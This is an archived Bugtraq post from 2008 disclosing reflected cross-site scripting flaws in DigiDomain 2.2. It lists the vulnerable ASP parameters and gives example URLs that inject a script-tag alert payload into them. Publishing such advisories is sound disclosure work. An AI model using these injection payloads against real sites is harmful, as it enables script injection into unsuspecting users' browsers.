lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 27 Mar 2008 03:13:48 -0000 From: xx_hack_xx_2004@...mail.com To: bugtraq@...urityfocus.com Subject: Multiple XSS in DigiDomain Hello i'm re-posting this message from the actual message which was on Tue-29 May 2007 becuase my old message got live example , anyway : Vulnerable : DigiDomain Version: 2.2 web : http://www.digiappz.com XSS : 1- http://site.com/lookup/lookup_result.asp?domain=[XSS]&tld=.com 2- http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS] Example : 1- http://site.com/lookup/lookup_result.asp?domain='><script>alert(1);</script>&tld=.com 2- http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1='><script>alert(1);</script>&word2='><script>alert(1);</script> Discovered By Linux_Drox LeZr.Com Best Regards ,,,
Powered by blists - more mailing lists